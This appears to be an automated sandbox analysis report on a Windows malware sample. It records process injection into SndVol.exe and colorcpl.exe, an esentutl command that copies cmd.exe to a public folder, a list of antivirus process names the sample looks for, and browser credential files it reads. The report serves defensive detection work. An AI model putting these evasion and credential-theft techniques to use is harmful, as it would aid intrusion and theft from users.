Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_2916BB71
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02C6894C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04421120 mov eax, dword ptr fs:[00000030h] 8_2_04421120
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04421120 mov eax, dword ptr fs:[00000030h] 8_2_04421120
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04464072 mov eax, dword ptr fs:[00000030h] 8_2_04464072
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29173355 mov eax, dword ptr fs:[00000030h] 8_2_29173355
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00443355 mov eax, dword ptr fs:[00000030h] 15_2_00443355
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D1120 mov eax, dword ptr fs:[00000030h] 15_2_077D1120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D1120 mov eax, dword ptr fs:[00000030h] 15_2_077D1120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07814072 mov eax, dword ptr fs:[00000030h] 15_2_07814072
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2917FBCD GetProcessHeap, 8_2_2917FBCD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_2916BB71
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29164BD8 SetUnhandledExceptionFilter, 8_2_29164BD8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29164A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_29164A8A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2916503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_2916503C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_0043503C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00434A8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0043BB71
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00434BD8 SetUnhandledExceptionFilter, 15_2_00434BD8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_078057A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_078057A7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_07805D59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_07805D59
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0780C88E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0780C88E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_078058F5 SetUnhandledExceptionFilter, 15_2_078058F5

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4420000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 4421644 Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 77D1644 Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4420000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4420000 Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_29142132
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_00412132
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29149662 mouse_event, 8_2_29149662
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_044559D3 cpuid 8_2_044559D3
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02C55ACC
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: GetLocaleInfoA, 0_2_02C5A7C4
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02C55BD8
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: GetLocaleInfoA, 0_2_02C5A810
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 8_2_2913F90C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 8_2_2917896D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 8_2_29181D58
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 8_2_29181FD0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_29182143
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 8_2_2918201B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 8_2_291820B6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 8_2_29182393
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 8_2_291825C3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 8_2_29178484
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_291824BC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_29182690
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 10_2_02AA5ACC
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 10_2_02AA5BD7
Source: C:\Users\Public\Libraries\Selebzih.PIF Code function: GetLocaleInfoA, 10_2_02AAA810
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_0045201B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_004520B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_00452143
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 15_2_00452393
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_00448484
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_004524BC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 15_2_004525C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_00452690
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 15_2_0044896D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 15_2_0040F90C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 15_2_00451D58
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_00451FD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 15_2_0781968A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 15_2_077E0629
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_078233AD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 15_2_078232E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_078191A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_078231D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 15_2_078230B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_07822E60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_07822DD3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_07822D38
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 15_2_07822CED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 15_2_07822A75
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5920C GetLocalTime, 0_2_02C5920C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914B69E GetUserNameW, 8_2_2914B69E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291793E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_291793E5
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5B78C GetVersionExA, 0_2_02C5B78C
Source: C:\Windows\SysWOW64\SndVol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_2913BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 15_2_0040BA4D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_2913BB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 8_2_2913BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 15_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 15_2_0040BB6B

Remote Access Functionality

barindex
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 8_2_2913569A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 15_2_0040569A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs